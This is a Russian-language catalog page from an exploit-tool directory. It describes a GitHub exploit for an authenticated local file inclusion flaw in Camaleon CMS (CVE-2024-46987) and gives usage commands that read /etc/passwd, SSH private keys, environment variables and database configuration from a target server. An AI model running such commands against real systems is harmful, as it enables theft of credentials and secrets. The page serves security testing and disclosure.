Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-46987 — CVE-2024-46987 — эксплойт LFI для Camaleon CMS | Kitploit
Инструменты/GitHubGitHub/rival420/cve-2024-46987
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubrival420/cve-2024-46987

CVE-2024-46987

CVE-2024-46987 — эксплойт LFI для Camaleon CMS

Репозиторий
27 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-46987 - Camaleon CMS Local File Inclusion

Эксплойт для аутентифицированного локального включения файлов (LFI) для Camaleon CMS.

Уязвимость

Camaleon CMS уязвим для аутентифицированной LFI-атаки через конечную точку /admin/media/download_private_file. Параметр file не проходит должную санитизацию, что позволяет выполнять обход каталогов для чтения произвольных файлов с сервера.

Затронутые версии

  • Camaleon CMS < 2.8.2

Требования

pip install requests

Использование

# Вывод файла в терминал (по умолчанию)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"

# Сохранение в файл
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt

Параметры

ПараметрОписание
-u, --urlЦелевой URL
-f, --fileФайл для чтения (например, /etc/passwd)
-t, --tokenЗначение cookie auth_token
-o, --outputИмя выходного файла (необязательно; если не указано, выводится в терминал)

Примеры

# Чтение файла passwd
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"

# Чтение SSH-ключей
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa

# Чтение переменных окружения
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"

# Чтение конфигурации приложения
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Используйте его только против систем, на тестирование которых у вас есть явное разрешение.

Ссылки

  • CVE-2024-46987
  • Camaleon CMS
Скачать инструмент